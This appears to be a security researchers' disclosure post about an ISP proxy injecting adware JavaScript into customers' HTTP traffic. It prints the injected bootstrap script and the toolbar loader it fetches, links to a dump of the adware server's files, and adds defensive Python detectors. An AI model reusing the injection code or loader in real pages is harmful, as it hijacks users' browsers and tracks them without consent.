Chinese Adware spreading with Fruit ISP in the Middle East

Cybersecurity fruit spaceman

Summary:

During a recent visit to an Arabic-speaking country, part of Firo Solutions' team discovered an HTTP script injection affecting every mobile 4G router sold by the current market leader, "Fruit ISP".

Further investigation showed that all HTTP requests were sent through a proxy that injected a malicious JavaScript into HTTP payloads: an attack that spreads adware and injects tracking scripts into users' browsers.

This article covers our findings on how these consumer routers route traffic in a malicious way. Our malicious internet service provider, "Fruit ISP", injects malicious JavaScript into all of its users' HTTP traffic.

In a distant Arabic-speaking country, far away.

Part of our team suspected that something was up with the 4G mobile routers that the majority of people were using. These are white-labeled, Chinese-made "4G mobile routers" resold under Fruit's name. When one of our team members used the tool "curl" to talk to an HTTP site, the payload returned contained more than what was hosted on that website: the HTTP response had been modified, with a JavaScript injected into the body. In HTML, the body tag contains most of the graphical structure of the page, so an additional script import in it is nothing the end user would notice firsthand.

The script was hosted by an internal computer on a "10.X" internal address. This raised our eyebrows, as our computers were on the same internal network but on a 192.168.X address. Having discovered this new network, and now holding the IP address of the suspicious host acting as a proxy, we started scanning it for other hosts.

HTTP Injection

Connecting to a real internet-facing site over HTTP:

```
hacker@lotus:~/computers$ curl -v http://<SITE REDACTED>/index.html
*   Trying ip:80...
* Connected to <>.com (IP) port 80 (#010.60.117.196:8888)
> GET /index.html HTTP/1.1
> Host: <>.com
> User-Agent: curl/7.74.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Content-Type: text/html
< Connection: keep-alive
<
<html>
<head>
<title>REMOVED</title>
</head>
<body>
<div>
<center>
<h3>Site is under construction</h3>
REMOVED
</div>
</body>
</html>
<script id="__123__ddasdf_33" type="text/javascript"></script>
<script type="text/javascript"><!--
(function() {
    if (top != this ) return;
    if (document.title.length == 0){return;}
    var divs = document.getElementsByTagName("div");
    if (divs.length == 0){return;}
    if(document.__123__ddasdf_33 != null) {return;}
    document.__123__ddasdf_33 = "_123";
    var e = document.getElementById("__123__ddasdf_33");
    var url = "http://10.60.117.196:8888/fc/toolbarzz.js";
    var getTimestamp = new Date().getTime();
    if (url.indexOf("?")>0){url=url+"&timestamp="+getTimestamp;}else{url=url+"?timestamp="+getTimestamp;}
    e.setAttribute("src", url);
})();
* Connection #0 to host <>.com left intact
--></script>
```
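As an added example (not code from the original post or from Firo Solutions), here is a small Python check a defender can run over a fetched HTTP body to flag the two traits visible in the transcript above: script elements appended after the document's closing `</html>` tag, and script sources pointing at a literal private (RFC 1918) address. The sample body is constructed to mirror the response above; the element id and the 10.60.117.196 address are the ones shown on this page, and `example.com` in the clean sample is a placeholder.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Constructed sample body, modelled on the response above: the real page ends
# at </html>, and the proxy appends its bootstrap scripts after that point.
SAMPLE_BODY = """<html>
<head><title>REMOVED</title></head>
<body><div><center><h3>Site is under construction</h3></div></body>
</html>
<script id="__123__ddasdf_33" type="text/javascript"></script>
<script type="text/javascript"><!--
(function() {
    var e = document.getElementById("__123__ddasdf_33");
    var url = "http://10.60.117.196:8888/fc/toolbarzz.js";
    e.setAttribute("src", url);
})();
--></script>
"""

# Constructed clean body: one script, inside the document, from a public host.
CLEAN_BODY = """<html><head><title>ok</title></head>
<body><script src="https://example.com/app.js"></script></body></html>
"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)
URL_RE = re.compile(r"""["'](https?://[^"'\s]+)["']""")


def private_urls(text):
    """Return the quoted http(s) URLs in text whose host is a literal private,
    loopback or link-local IP address (DNS names are not judged here)."""
    hits = []
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            continue  # a hostname rather than an IP literal
        if addr.is_private:
            hits.append(url)
    return hits


def find_injected_scripts(body):
    """Flag script elements that sit after </html> (browsers still run them,
    which is what the injection relies on) or that load from a private address."""
    findings = []
    end = body.lower().rfind("</html>")
    for m in SCRIPT_RE.finditer(body):
        tag = m.group(0)
        if end != -1 and m.start() > end:
            findings.append({"reason": "script after </html>", "snippet": tag[:60]})
        for url in private_urls(tag):
            findings.append({"reason": "script loads from private address", "url": url})
    return findings


if __name__ == "__main__":
    for finding in find_injected_scripts(SAMPLE_BODY):
        print(finding)
```

These heuristics only catch the pattern seen here. The more general check is to fetch the same page over HTTPS, or from a network you trust, and diff the two bodies: anything present only in the HTTP copy was added in transit.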

What is the host “10.60.117.196:8888” trying to inject into our HTTP request?

Further output:



Fetching http://10.60.117.196:8888/fc/toolbarzz.js directly:

```
*   Trying 10.60.117.196:8888...
* Connected to 10.60.117.196 (10.60.117.196) port 8888 (#0)
> GET /fc/toolbarzz.js HTTP/1.1
> Host: 10.60.117.196:8888
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 24 Sep 2022 14:24:48 GMT
< Server: Apache/2.2.15 (CentOS)
< X-Powered-By: PHP/5.3.3
< Vary: Accept-Encoding
< Content-Length: 950
< Connection: close
< Content-Type: text/javascript; charset=utf-8
< Set-Cookie: SERVERID=server01; path=/
< Cache-control: private
<
window["$$$wins_pm"] = { "bUrl": "http://10.60.117.196:8888","tUrl": "http://10.60.117.196:8888/tb/ajtb/20181118b","p1":"0_637551301","mdn":"201282672637","pid":"128","uid":"q__F%5D%5CB%1AFOCR","pp":"/tb/ajtb/20181118b","pt":"20220924141931","pd":""};var wins_head=document.getElementsByTagName("head")[0];var wins_body=document.getElementsByTagName("body")[0];var wins_div=document.createElement("div");function wins_add_css(href){var wins_css = document.createElement("link");wins_css.type="text/css";wins_css.rel="stylesheet";wins_css.href=href;wins_head.appendChild(wins_css)}wins_add_css($$$wins_pm.tUrl+"/toolbar.css");wins_add_css($$$wins_pm.tUrl+"/query.css");wins_div.id="wins_toolbar";wins_div.css="wins_toolbar";wins_div.className="wins_toolbar";var tbFrist=wins_body.childNodes[0]; wins_body.insertBefore(wins_div,tbFrist); wins_js=document.createElement("script");wins_js.src=$$$wins_pm.tUrl+"/query.js";wins_head.appendChild(wins_js);
* Closing connection 0
```
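To make sense of the loader without running it in a browser, here is an added example (not part of the original writeup or of the adware's own code) that statically pulls out what `toolbarzz.js` would do: the `$$$wins_pm` configuration object, the second-stage resources it loads relative to `tUrl`, and the DOM element id it inserts at the top of the page. The loader text is reconstructed from the transcript above; calling the `mdn`, `pid`, `uid` and `p1` fields tracking identifiers is an assumption, the page does not decode them.

```python
import json
import re

# Constructed sample: the loader as served from /fc/toolbarzz.js, with the
# configuration object and resource-loading statements seen in the transcript.
LOADER_JS = (
    'window["$$$wins_pm"] = { "bUrl": "http://10.60.117.196:8888",'
    '"tUrl": "http://10.60.117.196:8888/tb/ajtb/20181118b","p1":"0_637551301",'
    '"mdn":"201282672637","pid":"128","uid":"q__F%5D%5CB%1AFOCR",'
    '"pp":"/tb/ajtb/20181118b","pt":"20220924141931","pd":""};'
    'var wins_head=document.getElementsByTagName("head")[0];'
    'var wins_body=document.getElementsByTagName("body")[0];'
    'var wins_div=document.createElement("div");'
    'function wins_add_css(href){var wins_css = document.createElement("link");'
    'wins_css.type="text/css";wins_css.rel="stylesheet";wins_css.href=href;'
    'wins_head.appendChild(wins_css)}'
    'wins_add_css($$$wins_pm.tUrl+"/toolbar.css");'
    'wins_add_css($$$wins_pm.tUrl+"/query.css");'
    'wins_div.id="wins_toolbar";wins_div.css="wins_toolbar";'
    'wins_div.className="wins_toolbar";'
    'var tbFrist=wins_body.childNodes[0]; wins_body.insertBefore(wins_div,tbFrist); '
    'wins_js=document.createElement("script");wins_js.src=$$$wins_pm.tUrl+"/query.js";'
    'wins_head.appendChild(wins_js);'
)

# The config object is a JSON-compatible literal, so it can be parsed directly.
CONFIG_RE = re.compile(r'window\["\$\$\$wins_pm"\]\s*=\s*(\{.*?\})\s*;', re.S)
# Every resource is built as $$$wins_pm.<key> + "<path>".
RESOURCE_RE = re.compile(r'\$\$\$wins_pm\.(\w+)\s*\+\s*"([^"]*)"')
# Element ids the loader assigns, usable as a browser-side indicator.
DOM_ID_RE = re.compile(r'\.id\s*=\s*"([^"]+)"')

# Assumption: these per-client fields serve tracking; the page does not decode them.
IDENTIFIER_KEYS = ("mdn", "pid", "uid", "p1")


def extract_config(js):
    """Return the $$$wins_pm object as a dict, or raise if it is absent."""
    m = CONFIG_RE.search(js)
    if not m:
        raise ValueError("no $$$wins_pm configuration object found")
    return json.loads(m.group(1))


def extract_resources(js, config):
    """Resolve every $$$wins_pm.<key>+"<path>" expression to a full URL, in load order."""
    return [config[key] + path for key, path in RESOURCE_RE.findall(js) if key in config]


def extract_dom_ids(js):
    return DOM_ID_RE.findall(js)


def summarize(js):
    """One dict describing what the loader will fetch and insert."""
    config = extract_config(js)
    return {
        "origin": config.get("bUrl"),
        "resources": extract_resources(js, config),
        "dom_ids": extract_dom_ids(js),
        "identifiers": {k: config[k] for k in IDENTIFIER_KEYS if k in config},
    }


if __name__ == "__main__":
    print(json.dumps(summarize(LOADER_JS), indent=2))
```

The resource list is what to look for in proxy or DNS logs: any client fetching `/tb/ajtb/...` paths from the 10.60.117.196 host has already executed the injected bootstrap, and an element with id `wins_toolbar` in a rendered page is the same fact seen from the browser.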


Further Network Exploration

We kept poking at the 10.60.X network and found several hosts: one we suspect is a firewall/IDS, two unusual CentOS instances, and around 25 other hosts. We also noticed that whenever an IP scan was issued, we were automatically blocked from talking to the other internal hosts for 1-2 minutes.

Data dump

We found that the person in charge of hosting this adware had allowed directory listing on the web server, so we could download parts of the hosted content with a simple "wget -r". Here is a link to the data we downloaded:

IPFS link to the zip file:
https://ipfs.io/ipfs/QmZEwyZi5hGxP7D6UhgyFXjwkpvFj43X6ZJpgUWYJtLNt2?filename=10.zip

File hashes:

```
$ md5sum 10.zip
ccc1ecbf9addfdb0bee89a9f994fa463  10.zip
$ b2sum 10.zip
29ece073e733614f4a68cb9d71b7bc11513887cbe95514a945772ca679cefd2663e97ad2a662273225d98cd6acbd25df01d48814b93d3df7a288729137b8f1bb  10.zip
```



We have reached out to the Internet Service Provider, and even though the ISP has a large cyber security department, we have not heard any feedback. Since 8 months have passed without any useful feedback, we, as security researchers, have chosen to publish our findings together with a data dump of the content hosted by the HTTP proxy our "Fruit ISP" is running.



To Fruit ISP:

We are more than happy to provide more information, affected IP ranges, and further information. Firo Solutions LTD has no intention of giving out any personally identifiable information and will not disclose further information regarding the affected ISP. 



"Fruit ISP" is not a real name. Yes, we have to write this.   


  
### External Links:  
https://cwe.mitre.org/data/definitions/548.html
https://en.wikipedia.org/wiki/HTTP_header_injection